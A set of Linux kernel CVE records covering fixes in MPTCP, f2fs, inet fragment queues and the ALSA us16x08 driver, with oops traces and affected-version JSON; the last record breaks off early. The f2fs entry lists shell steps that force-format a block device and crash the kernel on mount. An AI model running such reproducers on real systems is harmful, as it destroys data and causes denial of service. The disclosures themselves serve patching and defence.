CVE-2025-71088 (GCVE-0-2025-71088)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:34 – Updated: 2026-01-13 15:34
Title
mptcp: fallback earlier on simult connection
Summary
In the Linux kernel, the following vulnerability has been resolved:

mptcp: fallback earlier on simult connection

Syzkaller reports a simult-connect race leading to inconsistent fallback
status:

    WARNING: CPU: 3 PID: 33 at net/mptcp/subflow.c:1515 subflow_data_ready+0x40b/0x7c0 net/mptcp/subflow.c:1515
    Modules linked in:
    CPU: 3 UID: 0 PID: 33 Comm: ksoftirqd/3 Not tainted syzkaller #0 PREEMPT(full)
    Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014
    RIP: 0010:subflow_data_ready+0x40b/0x7c0 net/mptcp/subflow.c:1515
    Code: 89 ee e8 78 61 3c f6 40 84 ed 75 21 e8 8e 66 3c f6 44 89 fe bf 07 00 00 00 e8 c1 61 3c f6 41 83 ff 07 74 09 e8 76 66 3c f6 90 <0f> 0b 90 e8 6d 66 3c f6 48 89 df e8 e5 ad ff ff 31 ff 89 c5 89 c6
    RSP: 0018:ffffc900006cf338 EFLAGS: 00010246
    RAX: 0000000000000000 RBX: ffff888031acd100 RCX: ffffffff8b7f2abf
    RDX: ffff88801e6ea440 RSI: ffffffff8b7f2aca RDI: 0000000000000005
    RBP: 0000000000000000 R08: 0000000000000005 R09: 0000000000000007
    R10: 0000000000000004 R11: 0000000000002c10 R12: ffff88802ba69900
    R13: 1ffff920000d9e67 R14: ffff888046f81800 R15: 0000000000000004
    FS: 0000000000000000(0000) GS:ffff8880d69bc000(0000) knlGS:0000000000000000
    CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
    CR2: 0000560fc0ca1670 CR3: 0000000032c3a000 CR4: 0000000000352ef0
    Call Trace:
     <TASK>
     tcp_data_queue+0x13b0/0x4f90 net/ipv4/tcp_input.c:5197
     tcp_rcv_state_process+0xfdf/0x4ec0 net/ipv4/tcp_input.c:6922
     tcp_v6_do_rcv+0x492/0x1740 net/ipv6/tcp_ipv6.c:1672
     tcp_v6_rcv+0x2976/0x41e0 net/ipv6/tcp_ipv6.c:1918
     ip6_protocol_deliver_rcu+0x188/0x1520 net/ipv6/ip6_input.c:438
     ip6_input_finish+0x1e4/0x4b0 net/ipv6/ip6_input.c:489
     NF_HOOK include/linux/netfilter.h:318 [inline]
     NF_HOOK include/linux/netfilter.h:312 [inline]
     ip6_input+0x105/0x2f0 net/ipv6/ip6_input.c:500
     dst_input include/net/dst.h:471 [inline]
     ip6_rcv_finish net/ipv6/ip6_input.c:79 [inline]
     NF_HOOK include/linux/netfilter.h:318 [inline]
     NF_HOOK include/linux/netfilter.h:312 [inline]
     ipv6_rcv+0x264/0x650 net/ipv6/ip6_input.c:311
     __netif_receive_skb_one_core+0x12d/0x1e0 net/core/dev.c:5979
     __netif_receive_skb+0x1d/0x160 net/core/dev.c:6092
     process_backlog+0x442/0x15e0 net/core/dev.c:6444
     __napi_poll.constprop.0+0xba/0x550 net/core/dev.c:7494
     napi_poll net/core/dev.c:7557 [inline]
     net_rx_action+0xa9f/0xfe0 net/core/dev.c:7684
     handle_softirqs+0x216/0x8e0 kernel/softirq.c:579
     run_ksoftirqd kernel/softirq.c:968 [inline]
     run_ksoftirqd+0x3a/0x60 kernel/softirq.c:960
     smpboot_thread_fn+0x3f7/0xae0 kernel/smpboot.c:160
     kthread+0x3c2/0x780 kernel/kthread.c:463
     ret_from_fork+0x5d7/0x6f0 arch/x86/kernel/process.c:148
     ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245
     </TASK>

The TCP subflow can process the simult-connect syn-ack packet after
transitioning to TCP_FIN1 state, bypassing the MPTCP fallback check,
as the sk_state_change() callback is not invoked for * -> FIN_WAIT1
transitions.

That will move the msk socket to an inconsistent status and the next
incoming data will hit the reported splat.

Close the race moving the simult-fallback check at the earliest possible
stage - that is at syn-ack generation time.

About the fixes tags: [2] was supposed to also fix this issue introduced
by [3]. [1] is required as a dependence: it was not explicitly marked as
a fix, but it is one and it has already been backported before [3]. In
other words, this commit should be backported up to [3], including [2]
and [1] if that's not already there.
Severity
No CVSS data available.
Impacted products
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/mptcp/options.c",
"net/mptcp/protocol.h",
"net/mptcp/subflow.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "b5f46a08269265e2f5e87d855287d6d22de0a32b",
"status": "affected",
"version": "01b7822700f2256900089e00390e119e1ad545df",
"versionType": "git"
},
{
"lessThan": "c9bf315228287653522894df9d851e9b43db9516",
"status": "affected",
"version": "1e777f39b4d75e599a3aac8e0f67d739474f198c",
"versionType": "git"
},
{
"lessThan": "79f80a7a47849ef1b3c25a0bedcc448b9cb551c1",
"status": "affected",
"version": "1e777f39b4d75e599a3aac8e0f67d739474f198c",
"versionType": "git"
},
{
"lessThan": "25f1ae942c097b7ae4ce5c2b9c6fefb8e3672b86",
"status": "affected",
"version": "1e777f39b4d75e599a3aac8e0f67d739474f198c",
"versionType": "git"
},
{
"lessThan": "71154bbe49423128c1c8577b6576de1ed6836830",
"status": "affected",
"version": "1e777f39b4d75e599a3aac8e0f67d739474f198c",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/mptcp/options.c",
"net/mptcp/protocol.h",
"net/mptcp/subflow.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.2"
},
{
"lessThan": "6.2",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.65",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc4",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "6.1.110",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "6.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.65",
"versionStartIncluding": "6.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.4",
"versionStartIncluding": "6.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc4",
"versionStartIncluding": "6.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: fallback earlier on simult connection\n\nSyzkaller reports a simult-connect race leading to inconsistent fallback\nstatus:\n\n WARNING: CPU: 3 PID: 33 at net/mptcp/subflow.c:1515 subflow_data_ready+0x40b/0x7c0 net/mptcp/subflow.c:1515\n Modules linked in:\n CPU: 3 UID: 0 PID: 33 Comm: ksoftirqd/3 Not tainted syzkaller #0 PREEMPT(full)\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014\n RIP: 0010:subflow_data_ready+0x40b/0x7c0 net/mptcp/subflow.c:1515\n Code: 89 ee e8 78 61 3c f6 40 84 ed 75 21 e8 8e 66 3c f6 44 89 fe bf 07 00 00 00 e8 c1 61 3c f6 41 83 ff 07 74 09 e8 76 66 3c f6 90 \u003c0f\u003e 0b 90 e8 6d 66 3c f6 48 89 df e8 e5 ad ff ff 31 ff 89 c5 89 c6\n RSP: 0018:ffffc900006cf338 EFLAGS: 00010246\n RAX: 0000000000000000 RBX: ffff888031acd100 RCX: ffffffff8b7f2abf\n RDX: ffff88801e6ea440 RSI: ffffffff8b7f2aca RDI: 0000000000000005\n RBP: 0000000000000000 R08: 0000000000000005 R09: 0000000000000007\n R10: 0000000000000004 R11: 0000000000002c10 R12: ffff88802ba69900\n R13: 1ffff920000d9e67 R14: ffff888046f81800 R15: 0000000000000004\n FS: 0000000000000000(0000) GS:ffff8880d69bc000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 0000560fc0ca1670 CR3: 0000000032c3a000 CR4: 0000000000352ef0\n Call Trace:\n \u003cTASK\u003e\n tcp_data_queue+0x13b0/0x4f90 net/ipv4/tcp_input.c:5197\n tcp_rcv_state_process+0xfdf/0x4ec0 net/ipv4/tcp_input.c:6922\n tcp_v6_do_rcv+0x492/0x1740 net/ipv6/tcp_ipv6.c:1672\n tcp_v6_rcv+0x2976/0x41e0 net/ipv6/tcp_ipv6.c:1918\n ip6_protocol_deliver_rcu+0x188/0x1520 net/ipv6/ip6_input.c:438\n ip6_input_finish+0x1e4/0x4b0 net/ipv6/ip6_input.c:489\n NF_HOOK include/linux/netfilter.h:318 [inline]\n NF_HOOK include/linux/netfilter.h:312 [inline]\n ip6_input+0x105/0x2f0 net/ipv6/ip6_input.c:500\n dst_input include/net/dst.h:471 [inline]\n ip6_rcv_finish net/ipv6/ip6_input.c:79 
[inline]\n NF_HOOK include/linux/netfilter.h:318 [inline]\n NF_HOOK include/linux/netfilter.h:312 [inline]\n ipv6_rcv+0x264/0x650 net/ipv6/ip6_input.c:311\n __netif_receive_skb_one_core+0x12d/0x1e0 net/core/dev.c:5979\n __netif_receive_skb+0x1d/0x160 net/core/dev.c:6092\n process_backlog+0x442/0x15e0 net/core/dev.c:6444\n __napi_poll.constprop.0+0xba/0x550 net/core/dev.c:7494\n napi_poll net/core/dev.c:7557 [inline]\n net_rx_action+0xa9f/0xfe0 net/core/dev.c:7684\n handle_softirqs+0x216/0x8e0 kernel/softirq.c:579\n run_ksoftirqd kernel/softirq.c:968 [inline]\n run_ksoftirqd+0x3a/0x60 kernel/softirq.c:960\n smpboot_thread_fn+0x3f7/0xae0 kernel/smpboot.c:160\n kthread+0x3c2/0x780 kernel/kthread.c:463\n ret_from_fork+0x5d7/0x6f0 arch/x86/kernel/process.c:148\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245\n \u003c/TASK\u003e\n\nThe TCP subflow can process the simult-connect syn-ack packet after\ntransitioning to TCP_FIN1 state, bypassing the MPTCP fallback check,\nas the sk_state_change() callback is not invoked for * -\u003e FIN_WAIT1\ntransitions.\n\nThat will move the msk socket to an inconsistent status and the next\nincoming data will hit the reported splat.\n\nClose the race moving the simult-fallback check at the earliest possible\nstage - that is at syn-ack generation time.\n\nAbout the fixes tags: [2] was supposed to also fix this issue introduced\nby [3]. [1] is required as a dependence: it was not explicitly marked as\na fix, but it is one and it has already been backported before [3]. In\nother words, this commit should be backported up to [3], including [2]\nand [1] if that\u0027s not already there."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:34:50.377Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/b5f46a08269265e2f5e87d855287d6d22de0a32b"
},
{
"url": "https://git.kernel.org/stable/c/c9bf315228287653522894df9d851e9b43db9516"
},
{
"url": "https://git.kernel.org/stable/c/79f80a7a47849ef1b3c25a0bedcc448b9cb551c1"
},
{
"url": "https://git.kernel.org/stable/c/25f1ae942c097b7ae4ce5c2b9c6fefb8e3672b86"
},
{
"url": "https://git.kernel.org/stable/c/71154bbe49423128c1c8577b6576de1ed6836830"
}
],
"title": "mptcp: fallback earlier on simult connection",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71088",
"datePublished": "2026-01-13T15:34:50.377Z",
"dateReserved": "2026-01-13T15:30:19.649Z",
"dateUpdated": "2026-01-13T15:34:50.377Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68769 (GCVE-0-2025-68769)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:28 – Updated: 2026-01-19 12:18
Title
f2fs: fix return value of f2fs_recover_fsync_data()
Summary
In the Linux kernel, the following vulnerability has been resolved:

f2fs: fix return value of f2fs_recover_fsync_data()

With below scripts, it will trigger panic in f2fs:

    mkfs.f2fs -f /dev/vdd
    mount /dev/vdd /mnt/f2fs
    touch /mnt/f2fs/foo
    sync
    echo 111 >> /mnt/f2fs/foo
    f2fs_io fsync /mnt/f2fs/foo
    f2fs_io shutdown 2 /mnt/f2fs
    umount /mnt/f2fs
    mount -o ro,norecovery /dev/vdd /mnt/f2fs
    or
    mount -o ro,disable_roll_forward /dev/vdd /mnt/f2fs

    F2FS-fs (vdd): f2fs_recover_fsync_data: recovery fsync data, check_only: 0
    F2FS-fs (vdd): Mounted with checkpoint version = 7f5c361f
    F2FS-fs (vdd): Stopped filesystem due to reason: 0
    F2FS-fs (vdd): f2fs_recover_fsync_data: recovery fsync data, check_only: 1
    Filesystem f2fs get_tree() didn't set fc->root, returned 1
    ------------[ cut here ]------------
    kernel BUG at fs/super.c:1761!
    Oops: invalid opcode: 0000 [#1] SMP PTI
    CPU: 3 UID: 0 PID: 722 Comm: mount Not tainted 6.18.0-rc2+ #721 PREEMPT(voluntary)
    Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
    RIP: 0010:vfs_get_tree.cold+0x18/0x1a
    Call Trace:
     <TASK>
     fc_mount+0x13/0xa0
     path_mount+0x34e/0xc50
     __x64_sys_mount+0x121/0x150
     do_syscall_64+0x84/0x800
     entry_SYSCALL_64_after_hwframe+0x76/0x7e
    RIP: 0033:0x7fa6cc126cfe

The root cause is we missed to handle error number returned from
f2fs_recover_fsync_data() when mounting image w/ ro,norecovery or
ro,disable_roll_forward mount option, result in returning a positive
error number to vfs_get_tree(), fix it.
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: 6781eabba1bdb133eb9125c4acf6704ccbe4df02 , < e6ac31abd30e9fd2ef5f0819ce7f3f932be3b725 (git) |
| Linux | Linux | Affected: 6781eabba1bdb133eb9125c4acf6704ccbe4df02 , < 0de4977a1eeafe9d77701e3c031a1bcdba389243 (git) |
| Linux | Linux | Affected: 6781eabba1bdb133eb9125c4acf6704ccbe4df02 , < 9bc246018aaa3b46a7710428d0a2196c229f9d49 (git) |
| Linux | Linux | Affected: 6781eabba1bdb133eb9125c4acf6704ccbe4df02 , < a4c67d96f92eefcfa5596a08f069e77b743c5865 (git) |
| Linux | Linux | Affected: 6781eabba1bdb133eb9125c4acf6704ccbe4df02 , < 473550e715654ad7612aa490d583cb7c25fe2ff3 (git) |
| Linux | Linux | Affected: 6781eabba1bdb133eb9125c4acf6704ccbe4df02 , < 4560db9678a2c5952b6205fbca468c6805c2ba2a (git) |
| Linux | Linux | Affected: 6781eabba1bdb133eb9125c4acf6704ccbe4df02 , < 01fba45deaddcce0d0b01c411435d1acf6feab7b (git) |
| Linux | Linux | Affected: 1499d39b74f5957e932639a86487ccea5a0a9740 (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/f2fs/super.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "e6ac31abd30e9fd2ef5f0819ce7f3f932be3b725",
"status": "affected",
"version": "6781eabba1bdb133eb9125c4acf6704ccbe4df02",
"versionType": "git"
},
{
"lessThan": "0de4977a1eeafe9d77701e3c031a1bcdba389243",
"status": "affected",
"version": "6781eabba1bdb133eb9125c4acf6704ccbe4df02",
"versionType": "git"
},
{
"lessThan": "9bc246018aaa3b46a7710428d0a2196c229f9d49",
"status": "affected",
"version": "6781eabba1bdb133eb9125c4acf6704ccbe4df02",
"versionType": "git"
},
{
"lessThan": "a4c67d96f92eefcfa5596a08f069e77b743c5865",
"status": "affected",
"version": "6781eabba1bdb133eb9125c4acf6704ccbe4df02",
"versionType": "git"
},
{
"lessThan": "473550e715654ad7612aa490d583cb7c25fe2ff3",
"status": "affected",
"version": "6781eabba1bdb133eb9125c4acf6704ccbe4df02",
"versionType": "git"
},
{
"lessThan": "4560db9678a2c5952b6205fbca468c6805c2ba2a",
"status": "affected",
"version": "6781eabba1bdb133eb9125c4acf6704ccbe4df02",
"versionType": "git"
},
{
"lessThan": "01fba45deaddcce0d0b01c411435d1acf6feab7b",
"status": "affected",
"version": "6781eabba1bdb133eb9125c4acf6704ccbe4df02",
"versionType": "git"
},
{
"status": "affected",
"version": "1499d39b74f5957e932639a86487ccea5a0a9740",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/f2fs/super.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.7"
},
{
"lessThan": "4.7",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.4.172",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nf2fs: fix return value of f2fs_recover_fsync_data()\n\nWith below scripts, it will trigger panic in f2fs:\n\nmkfs.f2fs -f /dev/vdd\nmount /dev/vdd /mnt/f2fs\ntouch /mnt/f2fs/foo\nsync\necho 111 \u003e\u003e /mnt/f2fs/foo\nf2fs_io fsync /mnt/f2fs/foo\nf2fs_io shutdown 2 /mnt/f2fs\numount /mnt/f2fs\nmount -o ro,norecovery /dev/vdd /mnt/f2fs\nor\nmount -o ro,disable_roll_forward /dev/vdd /mnt/f2fs\n\nF2FS-fs (vdd): f2fs_recover_fsync_data: recovery fsync data, check_only: 0\nF2FS-fs (vdd): Mounted with checkpoint version = 7f5c361f\nF2FS-fs (vdd): Stopped filesystem due to reason: 0\nF2FS-fs (vdd): f2fs_recover_fsync_data: recovery fsync data, check_only: 1\nFilesystem f2fs get_tree() didn\u0027t set fc-\u003eroot, returned 1\n------------[ cut here ]------------\nkernel BUG at fs/super.c:1761!\nOops: invalid opcode: 0000 [#1] SMP PTI\nCPU: 3 UID: 0 PID: 722 Comm: mount Not tainted 6.18.0-rc2+ #721 PREEMPT(voluntary)\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014\nRIP: 0010:vfs_get_tree.cold+0x18/0x1a\nCall Trace:\n \u003cTASK\u003e\n fc_mount+0x13/0xa0\n path_mount+0x34e/0xc50\n __x64_sys_mount+0x121/0x150\n do_syscall_64+0x84/0x800\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\nRIP: 0033:0x7fa6cc126cfe\n\nThe root cause is we missed to handle error number returned from\nf2fs_recover_fsync_data() when mounting image w/ ro,norecovery or\nro,disable_roll_forward mount option, result in returning a positive\nerror number to vfs_get_tree(), fix it."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:18:51.231Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/e6ac31abd30e9fd2ef5f0819ce7f3f932be3b725"
},
{
"url": "https://git.kernel.org/stable/c/0de4977a1eeafe9d77701e3c031a1bcdba389243"
},
{
"url": "https://git.kernel.org/stable/c/9bc246018aaa3b46a7710428d0a2196c229f9d49"
},
{
"url": "https://git.kernel.org/stable/c/a4c67d96f92eefcfa5596a08f069e77b743c5865"
},
{
"url": "https://git.kernel.org/stable/c/473550e715654ad7612aa490d583cb7c25fe2ff3"
},
{
"url": "https://git.kernel.org/stable/c/4560db9678a2c5952b6205fbca468c6805c2ba2a"
},
{
"url": "https://git.kernel.org/stable/c/01fba45deaddcce0d0b01c411435d1acf6feab7b"
}
],
"title": "f2fs: fix return value of f2fs_recover_fsync_data()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68769",
"datePublished": "2026-01-13T15:28:47.798Z",
"dateReserved": "2025-12-24T10:30:51.034Z",
"dateUpdated": "2026-01-19T12:18:51.231Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68768 (GCVE-0-2025-68768)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:28 – Updated: 2026-01-13 15:28
Title
inet: frags: flush pending skbs in fqdir_pre_exit()
Summary
In the Linux kernel, the following vulnerability has been resolved:
inet: frags: flush pending skbs in fqdir_pre_exit()
We have been seeing occasional deadlocks on pernet_ops_rwsem since
September in NIPA. The stuck task was usually modprobe (often loading
a driver like ipvlan), trying to take the lock as a Writer.
lockdep does not track readers for rwsems so the read wasn't obvious
from the reports.
On closer inspection the Reader holding the lock was conntrack looping
forever in nf_conntrack_cleanup_net_list(). Based on past experience
with occasional NIPA crashes I looked thru the tests which run before
the crash and noticed that the crash follows ip_defrag.sh. An immediate
red flag. Scouring thru (de)fragmentation queues reveals skbs sitting
around, holding conntrack references.
The problem is that since conntrack depends on nf_defrag_ipv6,
nf_defrag_ipv6 will load first. Since nf_defrag_ipv6 loads first its
netns exit hooks run _after_ conntrack's netns exit hook.
Flush all fragment queue SKBs during fqdir_pre_exit() to release
conntrack references before conntrack cleanup runs. Also flush
the queues in timer expiry handlers when they discover fqdir->dead
is set, in case packet sneaks in while we're running the pre_exit
flush.
The commit under Fixes is not exactly the culprit, but I think
previously the timer firing would eventually unblock the spinning
conntrack.
Severity
No CVSS data available.
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"include/net/inet_frag.h",
"include/net/ipv6_frag.h",
"net/ipv4/inet_fragment.c",
"net/ipv4/ip_fragment.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "c70df25214ac9b32b53e18e6ae3b8f073ffa6903",
"status": "affected",
"version": "d5dd88794a13c2f24cce31abad7a0a6c5e0ed2db",
"versionType": "git"
},
{
"lessThan": "006a5035b495dec008805df249f92c22c89c3d2e",
"status": "affected",
"version": "d5dd88794a13c2f24cce31abad7a0a6c5e0ed2db",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"include/net/inet_frag.h",
"include/net/ipv6_frag.h",
"net/ipv4/inet_fragment.c",
"net/ipv4/ip_fragment.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.3"
},
{
"lessThan": "5.3",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "5.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ninet: frags: flush pending skbs in fqdir_pre_exit()\n\nWe have been seeing occasional deadlocks on pernet_ops_rwsem since\nSeptember in NIPA. The stuck task was usually modprobe (often loading\na driver like ipvlan), trying to take the lock as a Writer.\nlockdep does not track readers for rwsems so the read wasn\u0027t obvious\nfrom the reports.\n\nOn closer inspection the Reader holding the lock was conntrack looping\nforever in nf_conntrack_cleanup_net_list(). Based on past experience\nwith occasional NIPA crashes I looked thru the tests which run before\nthe crash and noticed that the crash follows ip_defrag.sh. An immediate\nred flag. Scouring thru (de)fragmentation queues reveals skbs sitting\naround, holding conntrack references.\n\nThe problem is that since conntrack depends on nf_defrag_ipv6,\nnf_defrag_ipv6 will load first. Since nf_defrag_ipv6 loads first its\nnetns exit hooks run _after_ conntrack\u0027s netns exit hook.\n\nFlush all fragment queue SKBs during fqdir_pre_exit() to release\nconntrack references before conntrack cleanup runs. Also flush\nthe queues in timer expiry handlers when they discover fqdir-\u003edead\nis set, in case packet sneaks in while we\u0027re running the pre_exit\nflush.\n\nThe commit under Fixes is not exactly the culprit, but I think\npreviously the timer firing would eventually unblock the spinning\nconntrack."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:28:47.106Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/c70df25214ac9b32b53e18e6ae3b8f073ffa6903"
},
{
"url": "https://git.kernel.org/stable/c/006a5035b495dec008805df249f92c22c89c3d2e"
}
],
"title": "inet: frags: flush pending skbs in fqdir_pre_exit()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68768",
"datePublished": "2026-01-13T15:28:47.106Z",
"dateReserved": "2025-12-24T10:30:51.034Z",
"dateUpdated": "2026-01-13T15:28:47.106Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68783 (GCVE-0-2025-68783)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:28 – Updated: 2026-01-19 12:19
Title
ALSA: usb-mixer: us16x08: validate meter packet indices
Summary
In the Linux kernel, the following vulnerability has been resolved:
ALSA: usb-mixer: us16x08: validate meter packet indices
get_meter_levels_from_urb() parses the 64-byte meter packets sent by
the device and fills the per-channel arrays meter_level[],
comp_level[] and master_level[] in struct snd_us16x08_meter_store.
Currently the function derives the channel index directly from the
meter packet (MUB2(meter_urb, s) - 1) and uses it to index those
arrays without validating the range. If the packet contains a
negative or out-of-range channel number, the driver may write past
the end of these arrays.
Introduce a local channel variable and validate it before updating the
arrays. We reject negative indices, limit meter_level[] and
comp_level[] to SND_US16X08_MAX_CHANNELS, and guard master_level[]
updates with ARRAY_SIZE(master_level).
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
